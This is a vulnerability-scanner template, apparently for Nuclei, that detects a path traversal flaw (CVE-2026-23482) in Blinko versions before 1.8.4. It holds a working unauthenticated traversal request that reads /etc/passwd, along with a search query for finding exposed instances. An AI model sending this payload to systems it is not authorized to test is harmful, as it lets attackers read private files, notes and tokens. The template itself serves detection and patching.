id: CVE-2026-23482

info:
  name: Blinko < 1.8.4 - Path Traversal
  author: tx1ee
  severity: high
  description: |
    Blinko < 1.8.4 contains a path traversal vulnerability caused by a lack of permission checks and filtering on the temp/ path in the file server endpoint, letting unauthorized attackers read arbitrary files, including backup files containing user notes and tokens. Exploitation requires no special privileges.
  impact: |
    Unauthorized attackers can read arbitrary files, including sensitive user notes and tokens, leading to information disclosure.
  remediation: |
    Update to version 1.8.4 or later.
  reference:
    - https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781
    - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23482
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-23482
    cwe-id: CWE-22
    epss-score: 0.16712
    epss-percentile: 0.95059
  metadata:
    verified: true
    max-request: 1
    vendor: blinko-space
    product: blinko
    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
  tags: cve,cve2026,blinko,blinko-space,lfi,traversal

flow: http(1) && http(2)

http:
  # Request 1: fingerprint the target as a Blinko instance via its web manifest
  - method: GET
    path:
      - "{{BaseURL}}/manifest.webmanifest"
      - "{{BaseURL}}/manifest.json"
    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "Blinko"
        case-insensitive: true

  # Request 2: check whether the unauthenticated temp/ file endpoint serves files outside its directory
  - method: GET
    path:
      - "{{BaseURL}}/api/file/temp/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402201df07f63f9a1071f49fd71927979f08557831f8a45b47fa3ba69860a0469ae3c022041a7873201f298249ab4cf9168dcdf9034f83041fc2bc645de02a542f0bf2a69:922c64590222798bb761d5b6d8e72950